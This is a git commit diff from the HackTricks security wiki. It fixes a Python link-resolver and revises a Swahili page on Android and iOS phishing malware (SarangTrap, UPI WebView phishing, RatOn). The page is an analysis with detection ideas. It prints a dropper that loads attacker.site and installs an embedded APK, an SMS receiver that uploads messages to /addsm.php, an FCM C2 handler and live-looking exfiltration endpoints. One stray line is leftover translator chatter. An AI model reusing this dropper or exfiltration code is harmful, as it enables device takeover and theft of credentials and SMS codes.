Translated ['src/mobile-pentesting/android-app-pentesting/accessibility-
parent
4da68715d1
commit
376bd639c4
@ -17,7 +17,7 @@ handler2.setLevel(logging.ERROR)
|
||||
logger.addHandler(handler2)
|
||||
|
||||
|
||||
def findtitle(search ,obj, key, path=(),):
|
||||
def findtitle(search, obj, key, path=()):
|
||||
# logger.debug(f"Looking for {search} in {path}")
|
||||
if isinstance(obj, dict) and key in obj and obj[key] == search:
|
||||
return obj, path
|
||||
@ -54,26 +54,42 @@ def ref(matchobj):
|
||||
if href.endswith("/"):
|
||||
href = href+"README.md" # Fix if ref points to a folder
|
||||
if "#" in href:
|
||||
chapter, _path = findtitle(href.split("#")[0], book, "source_path")
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
result = findtitle(href.split("#")[0], book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for path: {href.split('#')[0]}")
|
||||
else:
|
||||
chapter, _path = findtitle(href, book, "source_path")
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
title = chapter['name']
|
||||
result = findtitle(href, book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
title = chapter['name']
|
||||
else:
|
||||
raise Exception(f"Chapter not found for path: {href}")
|
||||
except Exception as e:
|
||||
dir = path.dirname(current_chapter['source_path'])
|
||||
rel_path = path.normpath(path.join(dir,href))
|
||||
try:
|
||||
logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}')
|
||||
if "#" in href:
|
||||
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = " ".join(href.split("#")[1].split("-")).title()
|
||||
logger.debug(f'Ref has # using title: {title}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href.split('#')[0]))}")
|
||||
else:
|
||||
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
|
||||
title = chapter["name"]
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
result = findtitle(path.normpath(path.join(dir,href)), book, "source_path")
|
||||
if result is not None:
|
||||
chapter, _path = result
|
||||
title = chapter["name"]
|
||||
logger.debug(f'Recursive title search result: {chapter["name"]}')
|
||||
else:
|
||||
raise Exception(f"Chapter not found for relative path: {path.normpath(path.join(dir,href))}")
|
||||
except Exception as e:
|
||||
logger.debug(e)
|
||||
logger.error(f'Error getting chapter title: {rel_path}')
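Review bot: The four new `raise Exception(f"Chapter not found ...")` lines signal the expected "no chapter" case with the same bare `Exception` that the enclosing `except Exception as e:` handlers already catch, so a real bug in this block (a `KeyError` from `chapter["name"]`, a malformed `book`) is indistinguishable from the not-found case and silently triggers the relative-path retry. A dedicated class, `class ChapterNotFound(LookupError): pass`, raised at those four places and caught with `except ChapterNotFound:` in the two handlers, keeps the fallback for the intended case only and lets other errors surface. The inner handler only logs and does not assign, so after the final `logger.error(...)` line `chapter` and `title` appear to stay unbound; the enclosing `ref(matchobj)` starts before and continues after this hunk, so whether later code guards that cannot be confirmed here. Separately, `href.split("#")[0]` and `href.split("#")[1]` are recomputed several times in each branch; a single `base, _, anchor = href.partition("#")` before the `if "#" in href:` test would make the four branches read the same.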
|
||||
|
@ -768,7 +768,7 @@
|
||||
- [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||
- [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||
- [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||
- [ROP and JOP](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [ROP & JOP](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||
- [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
|
||||
- [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||
- [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
|
||||
@ -837,8 +837,9 @@
|
||||
- [WWW2Exec - GOT/PLT](binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md)
|
||||
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
|
||||
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
|
||||
- [Linux kernel exploitation - toctou](binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md)
|
||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
||||
|
||||
# 🤖 AI
|
||||
- [AI Security](AI/README.md)
|
||||
|
@ -3,63 +3,63 @@
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
> [!INFO]
|
||||
> Ukurasa huu unashughulikia mbinu zinazotumiwa na wahalifu kusambaza **malicious Android APKs** na **iOS mobile-configuration profiles** kupitia phishing (SEO, uhandisi wa kijamii, maduka ya uwongo, programu za uchumba, n.k.).
|
||||
> Nyenzo hii imebadilishwa kutoka kwa kampeni ya SarangTrap iliyofichuliwa na Zimperium zLabs (2025) na utafiti mwingine wa umma.
|
||||
> Ukurasa huu unafunika mbinu zinazotumiwa na wahalifu kusambaza **malicious Android APKs** na **iOS mobile-configuration profiles** kupitia phishing (SEO, social engineering, fake stores, dating apps, n.k.).
|
||||
> Nyenzo imeanzishwa kutoka kwenye kampeni ya SarangTrap iliyofichuliwa na Zimperium zLabs (2025) na utafiti mwingine wa umma.
|
||||
|
||||
## Attack Flow
|
||||
## Mtiririko wa Shambulio
|
||||
|
||||
1. **SEO/Phishing Infrastructure**
|
||||
* Jisajili majina ya kikoa yanayofanana (uchumba, kushiriki wingu, huduma za magari…).
|
||||
– Tumia maneno muhimu ya lugha ya ndani na emojis katika kipengele cha `<title>` ili kuorodheshwa kwenye Google.
|
||||
– Weka *zote* maelekezo ya usakinishaji ya Android (`.apk`) na iOS kwenye ukurasa mmoja wa kutua.
|
||||
2. **First Stage Download**
|
||||
* Android: kiungo cha moja kwa moja kwa APK *isiyosainiwa* au “maduka ya wahusika wengine”.
|
||||
* iOS: `itms-services://` au kiungo cha HTTPS wazi kwa profaili ya **mobileconfig** mbaya (angalia hapa chini).
|
||||
3. **Post-install Social Engineering**
|
||||
* Katika matumizi ya kwanza, programu inahitaji **nambari ya mwaliko / uthibitisho** (dhana ya ufikiaji wa kipekee).
|
||||
* Nambari hiyo inatumwa **POST kupitia HTTP** kwa Command-and-Control (C2).
|
||||
* C2 inajibu `{"success":true}` ➜ malware inaendelea.
|
||||
* Uchambuzi wa dynamic wa Sandbox / AV ambao hauwasilishi nambari halali unaona **hakuna tabia mbaya** (kuepuka).
|
||||
4. **Runtime Permission Abuse** (Android)
|
||||
* Ruhusa hatari zinahitajiwa tu **baada ya majibu chanya kutoka C2**:
|
||||
* Jisajili kanda nyingi za domain zinazofanana (apps za dating, huduma za kushirikisha faili, huduma za gari…).
|
||||
– Tumia maneno muhimu ya lugha ya eneo na emojis katika elementi ya `<title>` ili kupata nafasi kwenye Google.
|
||||
– Weka maelekezo ya usakinishaji ya *both* Android (`.apk`) na iOS kwenye ukurasa mmoja wa kutua.
|
||||
2. **Kipindi cha Kwanza cha Upakuaji**
|
||||
* Android: kiungo moja kwa moja kwa APK isiyo *unsigned* au “third-party store”.
|
||||
* iOS: `itms-services://` au kiungo cha HTTPS cha kawaida kinaelekeza kwenye **mobileconfig** profile yenye uharibifu (tazama chini).
|
||||
3. **Baada ya usakinishaji: Social Engineering**
|
||||
* Wakati wa kwanza kuendesha, app inaomba **invitation / verification code** (udanganyifu wa ufikiaji wa kipekee).
|
||||
* Msimbo hutumwa kwa **POST** kupitia HTTP hadi Command-and-Control (C2).
|
||||
* C2 inarudisha `{"success":true}` ➜ malware inaendelea.
|
||||
* Sandbox / AV dynamic analysis ambazo hazitumi msimbo halali haziona **hakuna tabia hatarishi** (evasion).
|
||||
4. **Matumizi mabaya ya ruhusa za Runtime** (Android)
|
||||
* Ruhusa hatarishi zinaombwa tu **baada ya jibu chanya kutoka C2**:
|
||||
```xml
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
|
||||
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
|
||||
<!-- Mifano ya zamani pia ilihitaji ruhusa za SMS -->
|
||||
<!-- Older builds also asked for SMS permissions -->
|
||||
```
|
||||
* Mifano ya hivi karibuni **ondoa `<uses-permission>` kwa SMS kutoka `AndroidManifest.xml`** lakini inacha njia ya msimbo wa Java/Kotlin inayosoma SMS kupitia reflection ⇒ inapunguza alama ya static wakati bado inafanya kazi kwenye vifaa vinavyotoa ruhusa kupitia unyanyasaji wa `AppOps` au malengo ya zamani.
|
||||
* Toleo za hivi karibuni **zinaondoa `<uses-permission>` kwa SMS kutoka `AndroidManifest.xml`** lakini zinaacha njia ya Java/Kotlin inayosoma SMS kupitia reflection ⇒ inapunguza alama ya static wakati bado inafanya kazi kwenye vifaa vinavyotoa ruhusa kwa njia ya `AppOps` abuse au malengo ya zamani.
|
||||
5. **Facade UI & Background Collection**
|
||||
* Programu inaonyesha maoni yasiyo na madhara (mtazamaji wa SMS, mchaguo wa picha) iliyotekelezwa kwa ndani.
|
||||
* Wakati huo inachukua:
|
||||
- IMEI / IMSI, nambari ya simu
|
||||
- Dump kamili ya `ContactsContract` (array ya JSON)
|
||||
- JPEG/PNG kutoka `/sdcard/DCIM` iliyoshinikizwa na [Luban](https://github.com/Curzibn/Luban) ili kupunguza ukubwa
|
||||
- Maudhui ya SMS ya hiari (`content://sms`)
|
||||
Payloads ni **batch-zipped** na kutumwa kupitia `HTTP POST /upload.php`.
|
||||
6. **iOS Delivery Technique**
|
||||
* Profaili moja ya **mobile-configuration** inaweza kuomba `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` n.k. kujiandikisha kifaa katika usimamizi kama “MDM”.
|
||||
* Maagizo ya uhandisi wa kijamii:
|
||||
1. Fungua Mipangilio ➜ *Profaili imeshushwa*.
|
||||
2. Bonyeza *Sakinisha* mara tatu (picha za skrini kwenye ukurasa wa phishing).
|
||||
3. Amini profaili isiyosainiwa ➜ mshambuliaji anapata *Contacts* & *Photo* haki bila ukaguzi wa Duka la Programu.
|
||||
7. **Network Layer**
|
||||
* HTTP wazi, mara nyingi kwenye bandari 80 na kichwa cha HOST kama `api.<phishingdomain>.com`.
|
||||
* App inaonyesha muonekano usio hatari (SMS viewer, gallery picker) utekelezaji wa ndani.
|
||||
* Wakati huo huo hutuma data nje (exfiltrates):
|
||||
- IMEI / IMSI, namba ya simu
|
||||
- Full `ContactsContract` dump (JSON array)
|
||||
- JPEG/PNG kutoka `/sdcard/DCIM` zinasimbwa na [Luban](https://github.com/Curzibn/Luban) ili kupunguza ukubwa
|
||||
- Yenye chaguo la SMS content (`content://sms`)
|
||||
Payloads zinazipiwa kwa batch (batch-zipped) na kutumwa kupitia `HTTP POST /upload.php`.
|
||||
6. **Teknika ya Uwasilishaji ya iOS**
|
||||
* Profile moja ya **mobile-configuration profile** inaweza kuomba `PayloadType=com.apple.sharedlicenses`, `com.apple.managedConfiguration` n.k. ili kujiandikisha kifaa kwa usimamizi unaofanana na “MDM”.
|
||||
* Maelekezo ya social-engineering:
|
||||
1. Fungua Settings ➜ *Profile downloaded*.
|
||||
2. Bonyeza *Install* mara tatu (picha-skrini kwenye ukurasa wa phishing).
|
||||
3. Amini profile isiyo signed ➜ mshambulizi anapata ruhusa za *Contacts* & *Photo* bila kupitia ukaguzi wa App Store.
|
||||
7. **Tabaka la Mtandao**
|
||||
* Plain HTTP, mara nyingi kwenye port 80 na HOST header kama `api.<phishingdomain>.com`.
|
||||
* `User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; Pixel 6 Build/TQ3A.230805.001)` (hakuna TLS → rahisi kugundua).
|
||||
|
||||
## Defensive Testing / Red-Team Tips
|
||||
|
||||
* **Dynamic Analysis Bypass** – Wakati wa tathmini ya malware, otomatisha awamu ya nambari ya mwaliko kwa Frida/Objection ili kufikia tawi la mbaya.
|
||||
* **Manifest vs. Runtime Diff** – Linganisha `aapt dump permissions` na `PackageManager#getRequestedPermissions()` wakati wa runtime; kukosekana kwa ruhusa hatari ni bendera nyekundu.
|
||||
* **Network Canary** – Sanidi `iptables -p tcp --dport 80 -j NFQUEUE` kugundua milipuko isiyo thabiti ya POST baada ya kuingiza nambari.
|
||||
* **mobileconfig Inspection** – Tumia `security cms -D -i profile.mobileconfig` kwenye macOS kuorodhesha `PayloadContent` na kugundua haki nyingi.
|
||||
* **Dynamic Analysis Bypass** – Wakati wa tathmini ya malware, otomatisha awamu ya invitation code kwa Frida/Objection ili kufikia tawi la uharibifu.
|
||||
* **Manifest vs. Runtime Diff** – Linganisha `aapt dump permissions` na runtime `PackageManager#getRequestedPermissions()`; kutokuwepo kwa ruhusa hatarishi ni ishara ya hatari.
|
||||
* **Network Canary** – Sanidi `iptables -p tcp --dport 80 -j NFQUEUE` kugundua POST bursts zisizo thabiti baada ya kuingiza msimbo.
|
||||
* **mobileconfig Inspection** – Tumia `security cms -D -i profile.mobileconfig` kwenye macOS ili orodhesha `PayloadContent` na kugundua entitlements za ziada.
|
||||
|
||||
## Blue-Team Detection Ideas
|
||||
|
||||
* **Certificate Transparency / DNS Analytics** ili kukamata milipuko ya ghafla ya majina ya kikoa yenye maneno muhimu.
|
||||
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` kutoka kwa wateja wa Dalvik nje ya Google Play.
|
||||
* **Invite-code Telemetry** – POST ya nambari za nambari za 6–8 mara tu baada ya usakinishaji wa APK inaweza kuashiria hatua ya maandalizi.
|
||||
* **MobileConfig Signing** – Zuia profaili za usanidi zisizosainiwa kupitia sera ya MDM.
|
||||
* **Certificate Transparency / DNS Analytics** ili kushika mfululizo wa ghafla wa domain zilizo na maneno muhimu.
|
||||
* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` kutoka kwa Dalvik clients nje ya Google Play.
|
||||
* **Invite-code Telemetry** – POST ya nambari za tarakimu 6–8 mara baada ya usakinishaji wa APK inaweza kuashiria staging.
|
||||
* **MobileConfig Signing** – Zuia configuration profiles zisizosainiwa kupitia sera za MDM.
|
||||
|
||||
## Useful Frida Snippet: Auto-Bypass Invitation Code
|
||||
```python
|
||||
@ -80,7 +80,7 @@ return conn;
|
||||
};
|
||||
});
|
||||
```
|
||||
## Ishara (Kawaida)
|
||||
## Viashiria (Za Kawaida)
|
||||
```
|
||||
/req/checkCode.php # invite code validation
|
||||
/upload.php # batched ZIP exfiltration
|
||||
@ -90,28 +90,28 @@ LubanCompress 1.1.8 # "Luban" string inside classes.dex
|
||||
|
||||
## Android WebView Payment Phishing (UPI) – Dropper + FCM C2 Pattern
|
||||
|
||||
Mwelekeo huu umeonekana katika kampeni zinazotumia mada za manufaa ya serikali kuiba akidi za UPI za India na OTPs. Opereta wanachanganya majukwaa maarufu kwa ajili ya usambazaji na uimara.
|
||||
Mufumo huu umeonekana katika kampeni zinazotumia mandhari za faida za serikali ili kuiba vyeti vya UPI vya India na OTPs. Waendeshaji huunganisha majukwaa yenye sifa kwa ajili ya usambazaji na ustahimilivu.
|
||||
|
||||
### Mnyororo wa usambazaji kupitia majukwaa ya kuaminika
|
||||
- YouTube video lure → maelezo yana kiungo kifupi
|
||||
- Shortlink → GitHub Pages phishing site inayofanana na lango halali
|
||||
- Reposi hiyo hiyo ya GitHub inahifadhi APK yenye alama ya uongo ya “Google Play” inayounganisha moja kwa moja na faili
|
||||
- Kurasa za phishing za dynamic zinaishi kwenye Replit; channel ya amri ya mbali inatumia Firebase Cloud Messaging (FCM)
|
||||
### Mnyororo wa utoaji kupitia majukwaa yanayotegemewa
|
||||
- Video ya kuvutia kwenye YouTube → maelezo yana kiunganisho kifupi
|
||||
- Kiunganisho kifupi → tovuti ya phishing kwenye GitHub Pages inayoiga portal halali
|
||||
- Repo hiyo ya GitHub inahifadhi APK yenye beji bandia “Google Play” inayounganisha moja kwa moja kwenye faili
|
||||
- Kurasa za phishing zinazobadilika zinahifadhiwa kwenye Replit; chaneli ya amri za mbali inatumia Firebase Cloud Messaging (FCM)
|
||||
|
||||
### Dropper yenye payload iliyojumuishwa na usakinishaji wa offline
|
||||
- APK ya kwanza ni installer (dropper) inayosafirisha malware halisi kwenye `assets/app.apk` na inamwambia mtumiaji kuzima Wi‑Fi/data ya simu ili kupunguza ugunduzi wa wingu.
|
||||
- Payload iliyojumuishwa inasakinishwa chini ya jina lisilo na hatari (mfano, “Secure Update”). Baada ya usakinishaji, installer na payload zote zinapatikana kama programu tofauti.
|
||||
### Dropper with embedded payload and offline install
|
||||
- APK ya kwanza ni msakinishaji (dropper) anayesafirisha malware halisi katika `assets/app.apk` na kuhimiza mtumiaji kuzima Wi‑Fi/data ya simu ili kupunguza utambuzi wa cloud.
|
||||
- Embedded payload inasakinishwa chini ya lebo isiyoonekana tishio (kwa mfano, “Secure Update”). Baada ya usakinishaji, msakinishaji na payload wote hubaki kama apps tofauti.
|
||||
|
||||
Static triage tip (grep for embedded payloads):
|
||||
Vidokezo vya triage ya static (grep for embedded payloads):
|
||||
```bash
|
||||
unzip -l sample.apk | grep -i "assets/app.apk"
|
||||
# Or:
|
||||
zipgrep -i "classes|.apk" sample.apk | head
|
||||
```
|
||||
### Ugunduzi wa mwisho wa dinamik kupitia kiungo kifupi
|
||||
- Malware inapata orodha ya maandiko ya maandiko, iliyotenganishwa kwa koma ya mwisho hai kutoka kwa kiungo kifupi; mabadiliko rahisi ya maandiko yanazalisha njia ya mwisho ya ukurasa wa phishing.
|
||||
### Ugunduzi wa endpoints kwa njia ya shortlink
|
||||
- Malware inachukua orodha ya plain-text, comma-separated ya live endpoints kutoka shortlink; simple string transforms hutengeneza final phishing page path.
|
||||
|
||||
Mfano (iliyosafishwa):
|
||||
Mfano (safishwa):
|
||||
```
|
||||
GET https://rebrand.ly/dclinkto2
|
||||
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
|
||||
@ -119,7 +119,7 @@ Transform: "gate.html" → "gate.htm" (loaded in WebView)
|
||||
UPI credential POST: https://sqcepo.replit.app/addup.php
|
||||
SMS upload: https://sqcepo.replit.app/addsm.php
|
||||
```
|
||||
Pseudo-code:
|
||||
Msimbo wa mfano (pseudo-code):
|
||||
```java
|
||||
String csv = httpGet(shortlink);
|
||||
String[] parts = csv.split(",");
|
||||
@ -128,7 +128,7 @@ String smsPost = parts[1];
|
||||
String credsPost = upiPage.replace("gate.htm", "addup.php");
|
||||
```
|
||||
### WebView-based UPI credential harvesting
|
||||
- Hatua ya “Fanya malipo ya ₹1 / UPI‑Lite” inachukua fomu ya HTML ya mshambuliaji kutoka kwa kiunganishi cha dinamik ndani ya WebView na inakamata maeneo nyeti (simu, benki, UPI PIN) ambayo yanatumwa kwa `POST` kwa `addup.php`.
|
||||
- Hatua ya “Make payment of ₹1 / UPI‑Lite” inapakia fomu ya HTML ya mshambulizi kutoka kwa endpoint ya dinamiki ndani ya WebView na inakusanya viwanja nyeti (nambari ya simu, benki, UPI PIN) ambavyo vinatumwa kwa `POST` kwenda `addup.php`.
|
||||
|
||||
Minimal loader:
|
||||
```java
|
||||
@ -136,18 +136,18 @@ WebView wv = findViewById(R.id.web);
|
||||
wv.getSettings().setJavaScriptEnabled(true);
|
||||
wv.loadUrl(upiPage); // ex: https://<replit-app>/gate.htm
|
||||
```
|
||||
### Kujitangaza na kukamata SMS/OTP
|
||||
- Ruhusa za nguvu zinahitajika kwenye matumizi ya kwanza:
|
||||
### Kujieneza mwenyewe na kukamata SMS/OTP
|
||||
- Ruhusa kali zinaombwa mara ya kwanza kuendeshwa:
|
||||
```xml
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.SEND_SMS"/>
|
||||
<uses-permission android:name="android.permission.READ_SMS"/>
|
||||
<uses-permission android:name="android.permission.CALL_PHONE"/>
|
||||
```
|
||||
- Mawasiliano yanapigwa ili kutuma ujumbe wa smishing kwa wingi kutoka kwa kifaa cha mwathirika.
|
||||
- SMS zinazokuja zinakamatwa na mpokeaji wa matangazo na kupakiwa na metadata (mjumbe, mwili, sloti ya SIM, kitambulisho cha nasibu cha kifaa) hadi `/addsm.php`.
|
||||
- Mawasiliano huwekwa katika mzunguko ili kutuma kwa wingi smishing SMS kutoka kwenye kifaa cha mwathiriwa.
|
||||
- SMS zinazoingia zinakamatwa na broadcast receiver na zinapakiwa zikiwa na metadata (sender, body, SIM slot, per-device random ID) kwenye `/addsm.php`.
|
||||
|
||||
Receiver sketch:
|
||||
Mchoro wa receiver:
|
||||
```java
|
||||
public void onReceive(Context c, Intent i){
|
||||
SmsMessage[] msgs = Telephony.Sms.Intents.getMessagesFromIntent(i);
|
||||
@ -161,8 +161,8 @@ postForm(urlAddSms, new FormBody.Builder()
|
||||
}
|
||||
}
|
||||
```
|
||||
### Firebase Cloud Messaging (FCM) kama C2 yenye uvumilivu
|
||||
- Payload inajiandikisha kwa FCM; ujumbe wa kusukuma hubeba uwanja wa `_type` unaotumika kama swichi kuanzisha vitendo (mfano, sasisha mifano ya maandiko ya ulaghai, badilisha tabia).
|
||||
### Firebase Cloud Messaging (FCM) kama C2 inayostahimili
|
||||
- Payload inasajiliwa kwa FCM; ujumbe za push zina sehemu `_type` inayotumika kama switch kuchochea vitendo (mfano: kusasisha kiolezo za maandishi za phishing, kuwasha/kuzima tabia).
|
||||
|
||||
Mfano wa payload ya FCM:
|
||||
```json
|
||||
@ -174,7 +174,7 @@ Mfano wa payload ya FCM:
|
||||
}
|
||||
}
|
||||
```
|
||||
Mchoro wa mpangilio:
|
||||
Handler rasimu:
|
||||
```java
|
||||
@Override
|
||||
public void onMessageReceived(RemoteMessage msg){
|
||||
@ -186,27 +186,177 @@ case "smish": sendSmishToContacts(); break;
|
||||
}
|
||||
}
|
||||
```
|
||||
### Hunting patterns and IOCs
|
||||
- APK ina payload ya pili kwenye `assets/app.apk`
|
||||
- WebView inachukua malipo kutoka `gate.htm` na kuhamasisha kwa `/addup.php`
|
||||
- Uhamasishaji wa SMS kwa `/addsm.php`
|
||||
- Upataji wa config unaoendeshwa na shortlink (mfano, `rebrand.ly/*`) ukirudisha mwisho wa CSV
|
||||
- Apps zilizoandikwa kama "Update/Secure Update" za kawaida
|
||||
- FCM `data` ujumbe wenye mtabo wa `_type` katika apps zisizoaminika
|
||||
### Mifumo ya uwindaji na IOCs
|
||||
- APK ina secondary payload kwenye `assets/app.apk`
|
||||
- WebView inapakia payment kutoka `gate.htm` na inatoa data kwa `/addup.php`
|
||||
- SMS exfiltration kwa `/addsm.php`
|
||||
- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) inayorejesha CSV endpoints
|
||||
- Apps zenye lebo ya generic “Update/Secure Update”
|
||||
- Ujumbe za FCM `data` zenye `_type` discriminator katika apps zisizo za kuaminika
|
||||
|
||||
### Detection & defence ideas
|
||||
- Flag apps ambazo zinaelekeza watumiaji kuzima mtandao wakati wa usakinishaji na kisha kuhamasisha APK ya pili kutoka `assets/`.
|
||||
- Onya kuhusu tuple ya ruhusa: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + michakato ya malipo ya WebView.
|
||||
- Ufuatiliaji wa egress kwa `POST /addup.php|/addsm.php` kwenye mwenyeji wasio wa kampuni; zuia miundombinu inayojulikana.
|
||||
- Kanuni za Mobile EDR: app isiyoaminika inajiandikisha kwa FCM na kujiunga kwenye uwanja wa `_type`.
|
||||
### Mapendekezo ya utambuzi na ulinzi
|
||||
- Wezesha alama kwa apps zinazowaelekeza watumiaji kuzima network wakati wa ufungaji kisha side-load APK ya pili kutoka `assets/`.
|
||||
- Toa onyo kwa tuple ya ruhusa: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows.
|
||||
- Ufuatiliaji wa egress kwa `POST /addup.php|/addsm.php` kwenye hosts zisizo za corporate; zuia infrastructure inayojulikana.
|
||||
- Sheria za Mobile EDR: app isiyo ya kuaminika inayosajiliwa kwa FCM na kuingia kwenye tawi kulingana na `_type` field.
|
||||
|
||||
---
|
||||
|
||||
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
|
||||
|
||||
Kampeni ya RatOn banker/RAT (ThreatFabric) ni mfano halisi wa jinsi operesheni za kisasa za mobile phishing zinavyochanganya WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, na hata NFC-relay orchestration. Sehemu hii inatoa muhtasari wa mbinu zinazoweza kurudiwa.
|
||||
|
||||
### Stage-1: WebView → native install bridge (dropper)
|
||||
Wavamizi wanaonyesha WebView inayorejea kwenye ukurasa wa mshambuliaji na kuingiza JavaScript interface inayofichua native installer. Kugusa kitufe cha HTML kunaita native code ambayo inasakinisha APK ya awamu ya pili iliyojumuishwa katika assets za dropper kisha kuiendesha moja kwa moja.
|
||||
|
||||
Mfano mdogo:
|
||||
```java
|
||||
public class DropperActivity extends Activity {
|
||||
@Override protected void onCreate(Bundle b){
|
||||
super.onCreate(b);
|
||||
WebView wv = new WebView(this);
|
||||
wv.getSettings().setJavaScriptEnabled(true);
|
||||
wv.addJavascriptInterface(new Object(){
|
||||
@android.webkit.JavascriptInterface
|
||||
public void installApk(){
|
||||
try {
|
||||
PackageInstaller pi = getPackageManager().getPackageInstaller();
|
||||
PackageInstaller.SessionParams p = new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
|
||||
int id = pi.createSession(p);
|
||||
try (PackageInstaller.Session s = pi.openSession(id);
|
||||
InputStream in = getAssets().open("payload.apk");
|
||||
OutputStream out = s.openWrite("base.apk", 0, -1)){
|
||||
byte[] buf = new byte[8192]; int r; while((r=in.read(buf))>0){ out.write(buf,0,r);} s.fsync(out);
|
||||
}
|
||||
PendingIntent status = PendingIntent.getBroadcast(this, 0, new Intent("com.evil.INSTALL_DONE"), PendingIntent.FLAG_UPDATE_CURRENT | PendingIntent.FLAG_IMMUTABLE);
|
||||
pi.commit(id, status.getIntentSender());
|
||||
} catch (Exception e) { /* log */ }
|
||||
}
|
||||
}, "bridge");
|
||||
setContentView(wv);
|
||||
wv.loadUrl("https://attacker.site/install.html");
|
||||
}
|
||||
}
|
||||
```
|
||||
Tafadhali weka hapa HTML au yaliyomo ya ukurasa unayotaka nitoe tafsiri. Nitatafsiri maandishi ya Kiingereza muhimu kwa Kiswahili na nitaacha bilioni za code, tags, links, refs, paths na majina ya huduma zisibadilishwe kama ulivyosema.
|
||||
```html
|
||||
<button onclick="bridge.installApk()">Install</button>
|
||||
```
|
||||
Baada ya kusakinishwa, dropper huanzisha payload kupitia explicit package/activity:
|
||||
```java
|
||||
Intent i = new Intent();
|
||||
i.setClassName("com.stage2.core", "com.stage2.core.MainActivity");
|
||||
startActivity(i);
|
||||
```
|
||||
Wazo la kuwinda: maombi yasiyotegemewa yanayoita `addJavascriptInterface()` na kufichua installer-like methods kwa WebView; APK ikisafirisha embedded secondary payload chini ya `assets/` na kuita Package Installer Session API.
|
||||
|
||||
### Mfereji wa idhini: Accessibility + Device Admin + maombi ya runtime yanayofuata
|
||||
Stage-2 hufungua WebView inayoweka ukurasa wa “Access”. Kitufe chake kinaita exported method ambayo inaelekeza mwenye madhara kwenye mipangilio ya Accessibility na kuomba kuwezesha rogue service. Mara inapopewa, malware hutumia Accessibility kubonyeza kiotomatiki kupitia dialog za ruhusa za runtime zinazofuata (contacts, overlay, manage system settings, n.k.) na kuomba Device Admin.
|
||||
|
||||
- Accessibility kwa programu husaidia kukubali maombi ya baadaye kwa kutafuta vitufe kama “Allow”/“OK” kwenye node-tree na kutekeleza bonyeza.
|
||||
- Uhakiki/ombi la ruhusa ya overlay:
|
||||
```java
|
||||
if (!Settings.canDrawOverlays(ctx)) {
|
||||
Intent i = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
|
||||
Uri.parse("package:" + ctx.getPackageName()));
|
||||
ctx.startActivity(i);
|
||||
}
|
||||
```
|
||||
Angalia pia:
|
||||
|
||||
{{#ref}}
|
||||
../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
|
||||
{{#endref}}
|
||||
|
||||
### Overlay phishing/ransom via WebView
|
||||
Operators wanaweza kutoa amri za kufanya:
|
||||
- kuonyesha overlay ya skrini nzima kutoka kwa URL, au
|
||||
- kupitisha inline HTML inayopakiwa ndani ya overlay ya WebView.
|
||||
|
||||
Matumizi yanayoweza: kulazimisha (kuingiza PIN), kufungua wallet ili kunasa PINs, ujumbe wa fidia. Weka amri ili kuhakikisha ruhusa ya overlay imetolewa kama haipo.
|
||||
|
||||
### Remote control model – text pseudo-screen + screen-cast
|
||||
